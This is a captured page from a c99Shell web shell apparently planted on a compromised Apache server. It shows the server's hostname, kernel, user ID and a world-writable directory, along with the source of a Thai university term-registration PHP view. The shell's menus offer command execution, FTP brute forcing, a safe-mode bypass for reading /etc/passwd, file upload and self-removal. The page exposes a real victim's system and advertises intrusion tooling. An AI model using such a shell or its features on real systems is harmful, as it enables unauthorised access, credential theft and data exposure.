!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/mis2222/application/views/eregis/   drwxrwxrwx
Free 50.65 GB of 127.8 GB (39.63%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     v_addTermConfig.php (5.9 KB)      -rwxr-xr-x
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
$row_tmc 
= isset($qu_tmc) ? $qu_tmc->row() : NULL;
?>
<table width="100%" align="center">
    <tr>
        <td>
            <div align="center">
            <table width="100%" border="0">
                <tr>
                    <td align="center" class="h error"><b>ข้อมูลปี/ภาคการศึกษา</b></td>
                </tr>
                <tr>
                    <td align="right">
<?php
                    
echo anchor_popup($this->config->item("rg_folder")."bdcollege/tmc_print""<img src=\"".base_url().$this->config->item('rg_print')."\" width=\"15\" height=\"14\" align=\"absmiddle\" border=\"0\" />");
?>
                    </td>
                </tr>
                <tr>
                    <td><?php echo form_open($this->config->item("rg_folder").$action);?>
                    <table class="szone">
                        <tr bgcolor="<?php echo $tr_color_even;?>">
                            <td class="coltd_szone">ปีการศึกษา (พ.ศ.)</td>
                            <td>
<?php
                            
if (isset($qu_tmc)) {
                                echo 
setValue('tmcAcY',$row_tmc);
?>
                            <input type="hidden" name="tmcAcY" id="tmcAcY" value="<?php echo setValue('tmcAcY',$row_tmc);?>" />
<?php
                            
} else {
?>
                            <input type="text" name="tmcAcY" id="tmcAcY" value="<?php echo setValue('tmcAcY',$row_tmc);?>" size="5" maxlength="4" class="required-int" />
                            <span class="error">* <?php echo form_error('tmcAcY');?></span>
<?php
                            
}
?>
                            </td>
                        </tr>
                        <tr bgcolor="<?php echo $tr_color_even;?>">
                            <td class="coltd_szone">ภาคการศึกษา</td>
                            <td>
<?php
                            
if (isset($qu_tmc)) {
                                echo 
setValue('tmcTmId',$row_tmc);
?>
                            <input type="hidden" name="tmcTmId" id="tmcTmId" value="<?php echo setValue('tmcTmId',$row_tmc);?>" />
                            <input type="hidden" name="edit" id="edit" value="<?php echo "edit";?>" />
<?php
                            
} else {
                                
$js "id=\"tmcTmId\" class=\"required\"";
                                echo 
form_dropdown('tmcTmId'$rs_tmsetValue('tmcTmId',$row_tmc), $js);
?>
                            <span class="error">* <?php echo form_error("tmcTmId");?></span>
<?php
                            
}
?>
                            </td>
                        </tr>
                        <tr bgcolor="<?php echo $tr_color_even;?>">
                            <td class="coltd_szone">วันที่เริ่มต้น</td>
                            <td><script>DateInput('tmcFrDate', true, 'DD/MM/YYYY', "<?php echo set_value('tmcFrDate') ? set_value('tmcFrDate') : splitDateDb2(getval('tmcFrDate'$row_tmcgetNowDate()), '/');?>");</script>
                            <span class="error"><?php echo form_error("tmcFrDate");?></span></td>
                        </tr>
                        <tr bgcolor="<?php echo $tr_color_even;?>">
                            <td class="coltd_szone">วันที่สิ้นสุด</td>
                            <td><script>DateInput('tmcToDate', true, 'DD/MM/YYYY', "<?php echo set_value('tmcToDate') ? set_value('tmcToDate') : splitDateDb2(getval('tmcToDate'$row_tmcgetNowDate()), '/');?>");</script>
                            <span class="error"><?php echo form_error("tmcToDate");?></span></td>
                        </tr>
                        <tr bgcolor="<?php echo $tr_color_even;?>">
                            <td colspan="2" align="center">
<?php
                            $lnk 
"<input type=\"submit\" id=\"btnSubmit\" name=\"btnSubmit\" value=\"บันทึก\" />";
                            if (isset(
$qu_tmc)) {
                                echo 
$oCRUD->CRUD($lnk'U');
                            } else {
                                echo 
$oCRUD->CRUD($lnk'C');
                            }
?>
                            <input type="reset" id="clear" name="clear" value="เคลียร์ข้อมูล" /></td>
                        </tr>
                    </table><?php echo form_close();?></td>
                </tr>
                <tr><td><br/></td></tr>
                <tr>
                    <td><table width="100%" align="center" class="headCol">
                        <tr>
                            <th class="amtCol"><font color="<?php echo $font_color_table;?>">ปีการศึกษา</font></th>
                            <th class="domAmtCol"><font color="<?php echo $font_color_table;?>">ภาคการศึกษา</font></th>
                            <th><font color="<?php echo $font_color_table;?>">วันที่เริ่มต้น</font></th>
                            <th><font color="<?php echo $font_color_table;?>">วันที่สิ้นสุด</font></th>
                            <th class="editCol"><font color="<?php echo $font_color_table;?>">แก้ไข</font></th>
                            <th class="deleteCol"><font color="<?php echo $font_color_table;?>">ลบ</font></th>
                        </tr>
<?php
                $i 
0;
                if (isset(
$rs_tmc) && $rs_tmc->num_rows()) {
                    foreach (
$rs_tmc->result() as $row) {
                        echo 
"<tr onmouseover=\"bgColor='".$tr_color_even."'\" onmouseout=\"bgColor='".$this->config->item("rg_mouseout")."'\">";
?>
                            <td align="center"><font size="2"><?php echo $row->tmcAcY;?></font></td>
                            <td align="center"><font size="2"><?php echo $row->tmName;?></font></td>
                            <td align="center"><font size="2"><?php echo abbreDate2($row->tmcFrDate);?></font></td>
                            <td align="center"><font size="2"><?php echo abbreDate2($row->tmcToDate);?></font></td>    
                            <td align="center">
                            <span class ="hand" onClick="sendPost(
                            'myform',{'tmcAcY':<?php echo $row->tmcAcY;?>,'tmcTmId':<?php echo $row->tmcTmId;?>,'edit':'<?php echo "edit";?>'},'tmc_input')"><img src="<?php echo base_url().$this->config->item("rg_edit");?>" align="absmiddle" border="0" /></span></td>
                            <td align="center">
<?php
                            $lnk 
"<span class=\"hand\" onClick=\"confirmDel2({'tmcAcY':".$row->tmcAcY.",'tmcTmId':".$row->tmcTmId."}, 'm_form1', '".site_url($this->config->item('rg_folder'))."/bdpbri/tmc_delete')\" /><img src=\"".base_url().$this->config->item("rg_delete")."\" align=\"absmiddle\" border=\"0\" width=\"16\" height=\"19\" /></span>";
                            echo 
$oCRUD->CRUD($lnk'D');
?>
                            </td>
                        </tr>
<?php
                        $i
++;
                    }
                } else {
?>
                        <tr>
                            <td colspan="6" align="center"><span class="error">** ไม่ปรากฏรายการในฐานข้อมูล **</span></td>
                        </tr>
<?php
                
}
?>
                    </table></td>
                </tr>
                <tr>
                    <td colspan="2" align="right"><font size="2">รวม <?php echo $rs_tmc->num_rows();?> รายการ</font></td>
                </tr>
            </table></div>
            <div class="error"><strong>หมายเหตุ : </strong>* หมายถึง ต้องกรอกข้อมูลให้สมบูรณ์</div>
        </td>
    </tr>
</table>

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0099 ]--